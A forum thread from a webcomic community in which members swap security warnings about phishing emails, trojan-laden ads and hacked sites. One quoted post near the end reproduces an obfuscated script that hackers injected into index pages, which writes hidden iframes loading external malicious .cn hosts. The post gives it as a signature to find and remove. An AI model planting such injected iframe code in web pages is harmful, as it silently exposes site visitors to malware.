TWCL Forum Index TWCL
Forums for The Webcomic List

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Traveler's Advisory (phish/hacker/viral/general warnings)
Goto page 1, 2  Next

View previous topic :: View next topic  
Casual Notice
Spambot Extraordinaire

PostPosted: Thu Jul 10, 2008 6:21 am    Post subject: Traveler's Advisory (phish/hacker/viral/general warnings) Reply with quote

Just felt I should mention to one and all that I received a Phishing e-mail purporting to be from Google Adsense and encouraging me to renew my adsense account.

I found this particularly amusing because I don't have advertising on my site...not even PW ads, and, even if I did, I wouldn't use GoogAds because their advertiser vetting process leaves a lot to be desired.

Then I remembered that a few of my fellows in comicland do use GoogAds, so I figgered I put out a warning to those who do to be sure to check your e-mail links and watchout for Phish.

ALso, maybe Oppy or someone can sticky this thread to serve as an ongoing portal for phish/hacker/viral warnings.
twotimingpete

PostPosted: Thu Jul 10, 2008 9:27 pm    Post subject: Reply with quote

I got nailed by a paypal phish when I was hungover and groggy and in a hurry to get to work a few years ago. I think I recovered from it, I changed every passwrod, cancelled all my credit cards, etc etc, did everything I could think of, but there's still that thought looming in the back of my mind that some asshole has my SS.

(yes, I gave my SS, yes, I was THAT dumb, seriously -- but it WAS a pristine phish job and I was compromised at the time, and it just so happened that I just did make changes to my paypal account in real life shortly before receiving the phish, so all the planets were aligned).

It'll haunt me forever.
Uses a ruler for everything

PostPosted: Wed Jul 23, 2008 11:00 pm    Post subject: Reply with quote

tpiro wrote:
Now that Platinum owns WOWIO, you may want to think about getting out of it (if you can, I don't know how binding the contract is). They have made a number of changes to their contract with publishers. DJ Coffman recently made a post explaining all the bad things in the contract. He should know because he was ROYALLY SCREWED by Platinum:

http://www.djcoffman.com/tikibar/2008/07/22/passing-on-the-new-wowio-deal-heres-why/

Just more evidence that: 1. you should avoid ANYTHING that Platinum has it's hands on and 2. there is no such thing as a free lunch.

S*P*Q*R
-I use a ruler for everything.
jdalton
Spambot Extraordinaire

PostPosted: Thu Jul 24, 2008 6:29 pm    Post subject: Reply with quote

So you're saying that all the trash I've been talking about WOWIO is now actually legitimate? *rubs hands with glee*

S*P*Q*R
Trazoi

PostPosted: Sun Jul 27, 2008 9:27 am    Post subject: Reply with quote

The Google Adsense phishes are one of the regulars in my spam bin. Since I don't use Google Adsense for my little blog site it's pretty easy to know they're fake. I also tend to get a few scams pretending to be from banks, and occasionally they hit the one I actually do business with.

The only time I've almost been fooled was with a fake email pretending to be a warning from ebay, but I logged into my account direct from the site rather than following any links from the email so there wasn't any harm done.
oppernaR

PostPosted: Sat Aug 30, 2008 3:27 am    Post subject: Reply with quote

Trazoi wrote:
The only time I've almost been fooled was with a fake email pretending to be a warning from ebay, but I logged into my account direct from the site rather than following any links from the email so there wasn't any harm done.

I've had that happening quite a few times, from paypal and the likes. Always wary of those emails.

Btw, just to keep this thread (and the threat (PUN!)) in everybody's minds:

http://www.thewebcomiclist.com/forums/viewtopic.php?t=3364&start=0

The WOWIO thread and credit to the people where it's due.

S*P*Q*R
Spade and Diamond

PostPosted: Wed Dec 24, 2008 5:56 pm    Post subject: Reply with quote

How much has Google's adsense helped with generating traffic to your site? Beside all the phishing and BS has it helped enough to sign up for it?
Casual Notice
Spambot Extraordinaire

PostPosted: Fri Feb 13, 2009 2:28 pm    Post subject: Reply with quote

More trojan ads. Not sure which service, but I got hit by attacks by an adobe-reader-based trojan on a couple of site after the ads loaded. Curreent versions of McAfee catch it just fine...not sure about Norton.
mooncity
is awesome cool.

PostPosted: Fri Feb 13, 2009 4:34 pm    Post subject: Reply with quote

I wish the TWCL folks would just go with Project Wonderful or something else less... trashy then those banner ads at the top. That would solve a lot of the problem, plus the site would probably load faster.

:C

The comic strip that never was.
Casual Notice
Spambot Extraordinaire

PostPosted: Fri Feb 13, 2009 5:28 pm    Post subject: Reply with quote

mooncity
is awesome cool.

PostPosted: Fri Feb 13, 2009 5:34 pm    Post subject: Reply with quote

Oh, thought you meant the banner up top.

Embarassed

The comic strip that never was.
Casual Notice
Spambot Extraordinaire

PostPosted: Sat Apr 04, 2009 3:39 pm    Post subject: Reply with quote

Another adservice is hosting an Adware worm. Not sure which, but my McAfee stopped ads on Girls With Slingshots and Schlock Mercenary.
Casual Notice
Spambot Extraordinaire

PostPosted: Mon Jun 22, 2009 1:19 pm    Post subject: Reply with quote

Just a note to remind everyone that early summer is hacker season, as the CompSci majors screw around and test their newfound evil powers (before summer ennui erases their brains). Hunter already got hit (twice) and the hacker did some serious (and pointless) damage to their systems. Nows the time to check your security and upgrade it if possible, especially if you have any php code with text entry routines.
oppernaR

PostPosted: Sat Aug 01, 2009 12:49 pm    Post subject: Reply with quote

jasonm wrote:
Just thought I'ad pass on a warning - My site was hit with an annoying virus. Basically, they hack the site and on the index page place this line of code near the top:

<script>document.write("<iframe"+ " s"+ "rc='htt"+ "p://"+ "z"+ "enit"+ "champion"+ ".c"+ "n/nic/"+ "main.p"+ "hp' height="+ "2 width=1></iframe>");</script><script>document.write("<"+ "i"+"f"+ "ra"+ "me "+"s"+ "r"+ "c=http"+"://vipproj"+"e"+ "cts."+ "cn/ hei"+"g"+"ht=1 width=1><"+ "/"+ "i"+"fram"+ "e"+">");</script>

If you find this code, delete it, change your passwords and check if you're still an approved site on google. Hope this can help spare a headache or two!

Thread

S*P*Q*R
jasonm

PostPosted: Mon Aug 03, 2009 6:29 pm    Post subject: Reply with quote

Honestly, what is with people having so much flipping free time that they bother doing virtual graphiti to an internet wall with their hacking? It's not like you get to see the look on anyones face. Idiots with too much free time.
Post new topic   Reply to topic    TWCL Forum Index -> General Ramblings All times are GMT + 1 Hour
Goto page 1, 2  Next
Page 1 of 2

Jump to: